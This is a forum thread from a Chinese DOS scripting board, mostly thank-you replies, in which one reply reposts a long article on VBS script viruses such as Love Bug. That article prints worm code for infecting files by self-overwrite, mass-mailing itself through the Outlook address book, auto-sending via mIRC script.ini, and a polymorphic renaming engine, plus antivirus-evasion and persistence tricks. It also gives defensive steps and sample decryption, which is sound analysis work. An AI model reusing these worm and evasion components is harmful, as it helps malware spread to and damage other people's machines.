China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

中国DOS联盟论坛
The time now is 2026-07-23 04:04
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » VBS Script Editing Tester (Applicable: Beginners in VBS Script) View 14,484 Replies 89
Original Poster Posted 2006-12-30 03:39 ·  中国 北京 联通
银牌会员
★★★
努力做坏人
Credits 1,185
Posts 438
Joined 2006-08-28 12:00
19-year member
UID 61449
From 北京
Status Offline
Giving it to you is just a waste.

[ Last edited by 9527 on 2007-4-12 at 09:51 PM ]
Recent Ratings for This Post ( 4 in total) Click for details
RaterScoreTime
ccwan +7 2007-01-13 03:04
bat-zw -8 2008-04-17 19:50
PPdos +1 2008-04-24 19:05
cyn01livecn -2 2011-01-24 13:42
我今后在论坛的目标就是做个超级坏人!!!
Floor 2 Posted 2006-12-30 03:50 ·  中国 上海 静安区 电信
初级用户
★★
Credits 148
Posts 69
Joined 2006-11-23 23:04
19-year member
UID 71504
Gender Male
Status Offline
Sofa, top it, download and collect
Floor 3 Posted 2006-12-30 03:53 ·  中国 湖北 武汉 电信
版主
★★★★★
Credits 11,386
Posts 4,938
Joined 2006-07-23 17:10
19-year member
UID 59080
Status Offline

  Top~ Download and try it out.
Floor 4 Posted 2006-12-30 03:54 ·  中国 四川 成都 教育网
铂金会员
★★★★
Credits 7,493
Posts 2,672
Joined 2005-09-02 00:00
20-year member
UID 42173
Gender Male
Status Offline
The works of Kevin1986 are indeed classic~~
Floor 5 Posted 2006-12-30 03:57 ·  中国 河北 廊坊 三河市 移动
金牌会员
★★★★
Credits 2,725
Posts 1,160
Joined 2006-09-23 12:00
19-year member
UID 63486
From 河北廊坊
Status Offline
Thanks for sharing
三人行,必有吾师焉。 学然后知不足,教然后知困,然后能自强也。
Floor 6 Posted 2006-12-30 06:05 ·  中国 北京 朝阳区 联通
高级用户
★★
朦胧的世界
Credits 579
Posts 218
Joined 2006-10-24 04:29
19-year member
UID 67972
Status Offline
Not bad. Thanks for sharing.

认识自己,降伏自己,改变自己
,才能改变别人!
Floor 7 Posted 2006-12-30 07:34 ·  中国 北京 朝阳区 联通
金牌会员
★★★★
Credits 2,902
Posts 1,147
Joined 2006-09-21 12:00
19-year member
UID 63324
Gender Male
Status Offline
Top!!! High-quality stuff~ : ) Download and collect~~~~
    Redtek,一个永远在网上流浪的人……

_.,-*~'`^`'~*-,.__.,-*~'`^`'~*-,._,_.,-*~'`^`'~*-,._,_.,-*~'`^`'~*-,._
Floor 8 Posted 2007-02-11 14:33 ·  中国 四川 成都 教育网
铂金会员
★★★★
Credits 7,493
Posts 2,672
Joined 2005-09-02 00:00
20-year member
UID 42173
Gender Male
Status Offline

Some complex VBS scripts cannot be executed successfully

In fact, the reason for the failure is that the WScript built-in object is not supported, because the script host is Script Control instead of WSH

C:\>BLOG http://initiative.yo2.cn/
C:\>hh.exe ntcmds.chm::/ntcmds.htm
C:\>cmd /cstart /MIN "" iexplore "about:<bgsound src='res://%ProgramFiles%\Common Files\Microsoft Shared\VBA\VBA6\vbe6.dll/10/5432'>"
Floor 9 Posted 2007-02-11 16:29 ·  中国 广东 广州 电信
初级用户
★★
Credits 197
Posts 77
Joined 2006-09-19 14:02
19-year member
UID 63074
Gender Male
Status Offline
Floor 10 Posted 2007-02-12 01:30 ·  中国 北京 鹏博士BGP
初级用户
Credits 26
Posts 11
Joined 2007-02-04 03:30
19-year member
UID 78571
Gender Male
Status Offline
Nice stuff, thanks!
Floor 11 Posted 2007-02-18 02:38 ·  中国 浙江 台州 路桥区 电信
高级用户
★★
DOS学徒
Credits 526
Posts 252
Joined 2007-02-12 05:35
19-year member
UID 79286
Gender Male
Status Offline
Floor 12 Posted 2007-02-25 05:18 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline
Push it up so that more people can benefit.
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 13 Posted 2007-02-28 17:11 ·  中国 江苏 淮安 电信
新手上路
Credits 14
Posts 7
Joined 2006-06-12 01:04
20-year member
UID 56895
Status Offline
Thanks for sharing
Floor 14 Posted 2007-03-01 04:07 ·  中国 广西 玉林 电信
初级用户
Credits 48
Posts 32
Joined 2007-02-28 23:26
19-year member
UID 80423
Gender Male
Status Offline
### VBS Script Virus

The popularity of the network has made our world more beautiful, but it also has unpleasant times. When you receive an email with the subject "I Love You" and click on the attachment with a mouse that's almost trembling with excitement; when you browse a trusted website and find that the speed of opening each folder is very slow, do you notice that the virus has invaded your world? The "Love Bug" network worm virus erupted in Europe and the United States on May 4, 2000. Due to its spread through the email system, the Love Bug virus swept through millions of computers worldwide in just a few days. The network systems of many large enterprises such as Microsoft and Intel were paralyzed, and global economic losses reached several billion US dollars. The newly erupted New Love Time virus last year still makes computer users extremely miserable.

The biggest common feature of the two viruses mentioned above is: they are written using VBScript. The reason why VBS script viruses represented by the Love Bug and New Love Time viruses are extremely rampant is that it is very easy to write them. Now we will analyze various aspects of VBS script viruses one by one:

#### I. Characteristics and Development Status of Vbs Script Viruses
VBS viruses are written in VB Script. This script language is very powerful. They use the open nature of the Windows system, and by calling some ready-made Windows objects and components, they can directly control the file system, registry, etc., and are very powerful. It should be said that a virus is an idea, but this idea becomes extremely easy to implement with VBS. VBS script viruses have the following characteristics:
1. Easy to write. A virus enthusiast who knows nothing about viruses can create a new virus in a very short time.
2. Great destructive power. Its destructive power is not only manifested in the destruction of the user's system files and performance. It can also make the email server crash and the network seriously blocked.
3. Strong infectivity. Since the script is directly interpreted and executed, and it does not need to do complex PE file format processing like PE viruses, such viruses can directly infect other similar files by self-replication, and self-abnormal handling becomes very easy.
4. Wide spread range. Such viruses can spread all over the world in a very short time through htm documents, Email attachments or other methods.
5. The virus source code is easy to obtain and has many variants. Since VBS viruses are interpreted and executed, their source code is very readable. Even if the virus source code is encrypted, it is relatively easy to obtain the source code. Therefore, there are many variants of such viruses. If the structure of the virus is slightly changed or the characteristic value is modified, many anti-virus software may be unable to do anything.
6. Strong deception. In order to get the chance to run, script viruses often use various means that users don't pay much attention to. For example, the attachment name of the email uses a double suffix, such as.jpg.vbs. Since the system does not display the suffix by default, when the user sees this file, they will think it is a jpg image file.
7. Makes it very easy to implement a virus generator. The so-called virus generator is a machine (of course, referring to a program) that can produce viruses according to the user's wishes. Currently, most virus generators are script virus generators. The most important reason is that the script is interpreted and executed, and it is very easy to implement, which will be discussed later.

Because of the above characteristics, script viruses have developed extremely rapidly. Especially the appearance of virus generators has made it very easy to generate new script viruses.

#### II. Principle Analysis of Vbs Script Viruses
1. How Vbs Script Viruses Infect and Search for Files
VBS script viruses generally infect files directly through self-replication. Most of the code in the virus can be directly attached in the middle of other similar programs. For example, the New Love Time virus can attach its own code to the end of the.htm file and add a statement to call the virus code at the top. The Love Bug virus directly generates a copy of a file, copies the virus code into it, and uses the original file name as the prefix of the virus file name and.vbs as the suffix. The following is a specific analysis of the infection and search principles of such viruses through part of the code of the Love Bug virus:

The following is part of the key code for file infection:
Set fso = createobject("scripting.filesystemobject") 'Create a file system object
set self = fso.opentextfile(wscript.scriptfullname, 1) 'Read and open the current file (i.e., the virus itself)
vbscopy = self.readall 'Read the entire virus code into the string variable vbscopy...
set ap = fso.opentextfile(目标文件.path, 2, true) 'Write and open the target file, ready to write virus code
ap.write vbscopy 'Cover the target file with the virus code
ap.close
set cop = fso.getfile(目标文件.path) 'Get the target file path
cop.copy(目标文件.path & ".vbs") 'Create another virus file (with.vbs as the suffix)
目标文件.delete(true) 'Delete the target file

The above describes how the virus file infects the normal file: first, the virus's own code is assigned to the string variable vbscopy, then this string is overwritten and written to the target file, and a file copy with the target file name as the file name prefix and.vbs as the suffix is created, and finally the target file is deleted.

The following is a specific analysis of the file search code:
' This function is mainly used to find files that meet the conditions and generate a virus copy of the corresponding file
sub scan(folder_) 'Define the scan function
on error resume next 'If an error occurs, skip directly to prevent popping up an error window
set folder_ = fso.getfolder(folder_)
set files = folder_.files 'Collection of all files in the current directory
for each file in files
ext = fso.GetExtensionName(file) 'Get the file suffix
ext = lcase(ext) 'Convert the suffix name to lowercase letters
if ext = "mp5" then 'If the suffix name is mp5, perform infection. Please create corresponding files with suffix names by yourself, preferably abnormal suffix names, so as not to damage normal programs.
Wscript.echo (file)
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders 'Search other directories; recursive call
scan( )
scan(subfolder)
next
end sub

The above code is the code analysis of the file search of the VBS script virus. The search part of the scan( ) function is relatively concise and clever, and uses a recursive algorithm to traverse the directories and files of the entire partition.

2. Several Ways of Network Spread of Vbs Script Viruses and Code Analysis
The wide spread range of VBS script viruses mainly depends on its network spread function. Generally speaking, VBS script viruses spread in the following ways:
1) Spread through Email attachments
This is a very common spread method. The virus can obtain legal Email addresses through various methods. The most common is to directly take the email addresses in the Outlook address book, or search for Email addresses in the user's documents (such as htm files) through the program.

The following is a specific analysis of how the VBS script virus does this:
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //Create an object of the OUTLOOK application
If outlookApp = "Outlook" Then
Set mapiObj = outlookApp.GetNameSpace("MAPI") //Get the namespace of MAPI
Set addrList = mapiObj.AddressLists //Get the number of address tables
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //Get the number of Email records in each address table
For addrEntIndex = 1 To addrEntCount //Traverse the Email addresses in the address table
Set item = outlookApp.CreateItem(0) //Get an instance of the mail object
Set addrEnt = addr.AddressEntries(addrEntIndex) //Get the specific Email address
item.To = addrEnt.Address //Fill in the recipient address item.Subject = "Virus Spread Experiment" //Write the email title
item.Body = "This is a virus email spread test, please don't panic when you receive this letter!" //Write the file content
Set attachMents = item.Attachments //Define the email attachment
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //The letter is automatically deleted after submission
If item.To <> "" Then
item.Send //Send the email
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //Virus mark to avoid repeated infection
End If
Next
End If
Next
End if
End Function

2) Spread through LAN sharing
LAN sharing spread is also a very common and effective network spread method. Generally speaking, in order to facilitate communication within the LAN, there must be many shared directories with writable permissions. For example, when Windows 2000 creates a share, it has writable permissions by default. In this way, the virus can spread the virus code to these directories by searching these shared directories.

In VBS, there is an object that can implement the search of shared folders on the network neighborhood and file operations. We can use this object to achieve the purpose of spread.
welcome_msg = "Network Connection Search Test"
Set WSHNetwork = WScript.CreateObject("WScript.Network") 'Create a network object
Set oPrinters = WshNetwork.EnumPrinterConnections 'Create a network printer connection list
WScript.Echo "Network printer mappings:"
For i = 0 to oPrinters.Count - 1 Step 2 'Display the network printer connection situation
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives 'Create a network shared connection list
If colDrives.Count = 0 Then
MsgBox "No drives to list.", vbInformation + vbOkOnly,welcome_msg
Else
strMsg = "Current network drive connections: " & CRLF
For i = 0 To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13) & Chr(10) & colDrives(i) & Chr(9) & colDrives(i + 1)
Next
MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg'Display the current network drive connections
End If

The above is a complete script program used to find the current printer connections and network shared connections and display them. After knowing the shared connections, we can directly read and write files to the target drive.

3) Spread by infecting web files such as htm, asp, jsp, php
Nowadays, WWW services have become very common. The virus will inevitably cause the user's machines that have visited the web page to be infected with the virus by infecting htm files.

The reason why the virus can play a powerful role in htm files is that it uses the same principle as most web malicious codes. Basically, they use the same code, but other codes can also be used. This code is the key for the virus FSO, WSH and other objects to run in the web page. In the registry HKEY_CLASSES_ROOT\CLSID\, we can find such a key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, and the description in the registry is "Windows Script Host Shell Object". Similarly, we can also find {0D43FE01-F093-11CF-8940-00A0C9054228}, and the description in the registry is "FileSystem Object". Generally, we need to initialize COM first. After obtaining the corresponding component objects, the virus can correctly use the FSO and WSH objects and call their powerful functions. The code is as follows:
Set Apple0bject = document.applets("KJ_guest")
Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Apple0bject.createInstance() 'Create an instance
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance() 'Create an instance
Set FSO = Apple0bject.Get0bject()

No further analysis will be made for other types of files here.

4) Spread through IRC chat channels
The virus generally uses the following code to spread through IRC (taking MIRC as an example)
Dim mirc
set fso=CreateObject("Scripting.FileSystemObject")
set mirc=fso.CreateTextFile("C:\mirc\script.ini") 'Create the file script.ini
fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True 'Backup the virus file to attachment.vbs
mirc.WriteLine "[script]"
mirc.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }"
'Use the command /ddc send $nick attachment.vbs to send the virus file to other users in the channel
mirc.Close

The above code is used to write a line of code into the Script.ini file, and actually many other codes will be written. The commands in Script.ini are used to control the IRC session, and the commands in this file can be executed automatically. For example, the "Song Bug" virus TUNE.VBS will modify c:\mirc\script.ini and c:\mirc\mirc.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC. Similarly, if Pirch98 is installed in the c:\pirch98 directory of the target computer, the virus will modify c:\pirch98\events.ini and c:\pirch98\pirch98.ini so that whenever an IRC user uses the infected channel, they will receive a TUNE.VBS sent via DDC.

In addition, the virus can also spread through the currently widely popular KaZaA. The virus copies the virus file to the default shared directory of KaZaA, so that when other users access this machine, they may download and execute the virus file. This spread method may play a role with the popularity of peer-to-peer sharing tools such as KaZaA.

There are some other spread methods, which will not be listed one by one here.

3. How VBS Script Viruses Obtain Control
How to obtain control? This is a relatively interesting topic, and VBS script viruses seem to have brought this topic to the extreme. The author lists several typical methods here:
1) Modify the registry key
When Windows starts, it will automatically load the programs pointed to by the key values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The script virus can add a key value here to point to the virus program, so as to ensure that it gets control every time the machine starts. The method for vbs to modify the registry is relatively simple, and you can directly call the following statement.
wsh.RegWrite(strName, anyvalue [,strType])
2) Through the mapping file execution method
For example, the New Love Time virus modifies the execution method of dll to wscript.exe. It can even point the mapping of the exe file to the virus code.
3) Deceive the user to let the user execute it themselves
This method is actually related to the user's psychology. For example, when the virus sends an attachment, it uses a file name with a double suffix. Since the suffix is not displayed by default, for example, a vbs program named beauty.jpg.vbs is displayed as beauty.jpg. At this time, the user will often click it as a picture. Similarly, for the user's own files on the disk, when the virus infects them, it generates a virus file with the original file name as the prefix and.vbs as the suffix, and deletes the original file. In this way, the user may run this vbs file as their original file.
4) Desktop.ini and folder.htt cooperate with each other
These two files can be used to configure the active desktop and can also be used to customize the folder. If the user's directory contains these two files, when the user enters the directory, the virus code in folder.htt will be triggered. This is a relatively effective method for the New Love Time virus to obtain control. And using folder.htt, it may also trigger the exe file, which may also become an effective method for the virus to get control!

There are many other methods for the virus to obtain control, and the author has a lot of room for play in this regard.

4. Several Skills of Vbs Script Viruses to Resist Anti-virus Software
For the virus to survive, the ability to resist anti-virus software is also necessary. Generally speaking, VBS script viruses use the following methods to resist anti-virus software:
1) Self-encryption
For example, the New Love Time virus can randomly select a key to encrypt and transform part of its own code, so that the virus code infected each time is different, achieving a polymorphic effect. This brings some difficulties to the traditional signature-based virus detection method. The virus can further use the metamorphosis technology, so that the decrypted code of the encrypted virus after each infection is different.

The following is a simple vbs script metamorphosis engine (from flyshadow)
Randomize
Set Of = CreateObject("Scripting.FileSystemObject") 'Create a file system object
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall 'Read its own code
fS = Array("Of", "vC", "fS", "fSC") 'Define an array of strings that will be replaced
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))) 'Replace the strings in array fS with 4 random characters
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 'Write the replaced code back to the file

This code makes the four strings Of, vC, fS, and fSC in this VBS file be replaced with random strings every time it runs, which can largely prevent anti-virus software from detecting it using the signature-based virus detection method.
2) Skillfully using the Execute function
Friends who have used VBS programs may find it strange: when a normal program uses the FileSystemObject object, some anti-virus software will report that the risk of this Vbs file is high when scanning this program, but why do some VBS script viruses also use the FileSystemObject object but there is no warning? The reason is very simple, that is, these viruses skillfully use the Execute method. Some anti-virus software will check whether the program declares to use the FileSystemObject object when detecting VBS viruses. If it is used, it will issue an alarm. If the virus converts this declaration code into a string and then executes it through the Execute(String) function, it can avoid some anti-virus software.
3) Changing the declaration method of some objects
For example, fso = createobject("scripting.filesystemobject"), we change it to
fso = createobject("script" + "ing.filesyste" + "mobject"), so that the anti-virus software will not find the FileSystemObject object when it performs static scanning.
4) Directly closing the anti-virus software
VBS script has powerful functions. It can directly search for the user's processes and then compare the process names. If it finds that it is the process of the anti-virus software, it will directly close it and delete some of its key programs.

5. Introduction to the Principle of Vbs Virus Generator
The so-called virus generator refers to software that can directly generate virus source code according to the user's selection. To many people, this may be inconceivable, but in fact, it is very simple to implement for script viruses.

The script language is interpreted and executed, does not need to be compiled, and there is no need for verification and positioning in the program. Each statement is separated relatively clearly. In this way, first make the virus functions into many separate modules. After the user makes the virus function selection, the generator only needs to piece together the corresponding function modules, and finally make corresponding code replacements and optimizations. Due to space limitations and other reasons, it will not be introduced in detail here.

#### III. How to Prevent Vbs Script Viruses
1. How to Extract (Encrypt) Script Viruses from Samples
For unencrypted script viruses, we can directly find them from the virus samples. Now, how to extract encrypted VBS script viruses from the virus samples is introduced. Here we take the New Love Time as an example.

Open folder.htt with JediEdit. We find that this file has only 93 lines. The first line is <BODY onload="vbscript:KJ_start()">, after a few lines of comments, it starts with <html> and ends with </html>. I believe everyone knows what type of file this is!

Lines 87 to 91 are the following statements:
87: <script language=vbscript>
88: ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...; the rest is omitted, it's very long!
89: Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 3"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next") 90: Execute(ThisText) 91: </script>

Lines 87 and 91 need no explanation. Line 88 is the assignment of a string, which is obviously encrypted virus code. Looking at the last part of line 89, ThisText = ThisText & TempChar, plus the next line, we can definitely guess that ThisText contains the virus decryption code (of course, brothers who are familiar with vbs can also analyze this decryption code, too simple! Even if you don't look at the code at all, you should be able to see it). Line 90 is to execute the code in ThisText just now (the code after decryption processing).

So, what should be done next? Very simple, we just need to output the content of ThisText to a text file after the virus code is decrypted. Since the above lines are vbscript, I created the following.txt file:

First, copy lines 88 and 89 to the just-created.txt file. Of course, if you are willing to see the execution effect of the New Love Time, you can also enter line 90 at the end. Then enter the vbs code for creating a file and writing ThisText to the file below. The entire file is as follows:
ExeString = "Afi... ' Line 88 code Execute("Dim KeyAr... ' Line 89 code
set fso = createobject("scripting.filesystemobject") ' Create a file system object
set virusfile = fso.createtextfile("resource.log",true) ' Create a new file resource.log to store the decrypted virus code virusfile.writeline(ThisText) ' Write the decrypted code to resource.log

OK! It's that simple. Save the file, change the file suffix name.txt to.vbs (.vbe is also okay), double-click, and you will find that there is an additional file resource.log in the directory of this file. Open this file, how about it? Is it the source code of "New Love Time"?

2. Weaknesses of Vbs Script Viruses
Because the programming language of vbs script viruses is a script, it will not be as convenient and flexible as PE files. Its operation requires conditions (but this condition is usually met by default). The author believes that VBS script viruses have the following weaknesses:
1) Most VBS script viruses need to use an object: FileSystemObject when running
2) VBScript code is interpreted and executed through Windows Script Host.
3) The operation of VBS script viruses requires the support of its associated program Wscript.exe.
4) Viruses spread through the web need the support of ActiveX
5) Viruses spread through Email need the support of the automatic email sending function of OE, but most viruses use Email as the main spread method.

3. How to Prevent and Remove Vbs Script Viruses
Aiming at the weaknesses of the VBS script viruses mentioned above, the author puts forward the following prevention measures:
1) Disable the file system object FileSystemObject
Method: Use the command regsvr32 scrrun.dll /u to disable the file system object. Among them, regsvr32 is an executable file in Windows\System. Or directly find the scrrun.dll file and delete or rename it.

There is also a method to find a key {0D43FE01-F093-11CF-8940-00A0C9054228} in the registry HKEY_CLASSES_ROOT\CLSID\ and delete it.
2) Uninstall Windows Scripting Host
In Windows 98 (the same applies to NT 4.0 and above), open [Control Panel] → [Add/Remove Programs] → [Windows Installation Program] → [Accessories], and cancel the "Windows Scripting Host" item.

The same as the above method, find a key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} in the registry HKEY_CLASSES_ROOT\CLSID\ and delete it.
3) Delete the mapping between VBS, VBE, JS, JSE file suffixes and application programs
Click [My Computer] → [View] → [Folder Options] → [File Types], and then delete the mapping between VBS, VBE, JS, JSE file suffixes and application programs.
4) In the Windows directory, find WScript.exe, change its name or delete it. If you think you may need to use it later, it is better to change its name. Of course, you can reinstall it later.
5) To completely prevent VBS network worm viruses, you also need to set your browser. First, open the browser, click the [Custom Level] button in the [Security] tab in the [Internet Options] menu bar. Set all "ActiveX controls and plugins" to disabled. This way, you don't have to worry. Hehe, for example, if the ActiveX component of the New Love Time cannot run, this network spread function will be useless.
6) Disable the automatic sending and receiving email function of OE
7) Since worm viruses mostly make use of file extensions, to prevent them, do not hide the extensions of known file types in the system. Windows defaults to "Hide extensions for known file types", and change it to display the extensions of all file types.
8) Set the security level of the system's network connection to at least "Medium". It can prevent some harmful Java programs or some ActiveX components from invading the computer to a certain extent.
9) Hehe, the last item, everyone should know it without saying. Anti-virus software is indeed necessary. Although some anti-virus software makes many users disappointed, but the choice is mutual. In this network full of viruses, if your machine is not installed with anti-virus software, I think it's really incredible.

#### IV. Outlook on the Development of All Script-based Viruses
With the rapid development of the network, network worm viruses have become popular, and VBS script worms are even more prominent, not only in large numbers but also powerful. Since it is relatively easy to write viruses using scripts, in addition to continuing to popularize the current VBS script viruses, more other script-based viruses, such as PHP, JS, Perl viruses, will gradually appear.

But scripts are not the best tool for real virus technology enthusiasts to write viruses, and script viruses are relatively easy to remove and prevent. The author believes that script viruses will continue to be popular, but script worm viruses that can have a great impact like the Love Bug and New Love Time are just a minority.
Floor 15 Posted 2007-03-01 05:04 ·  中国 广东 佛山 电信
新手上路
Credits 7
Posts 4
Joined 2006-11-22 03:43
19-year member
UID 71320
Gender Male
Status Offline
Next, let's take a look. I want to learn everything, but just can't learn it. I'm so useless.
1 2 3 6 Next ›
Forum Jump: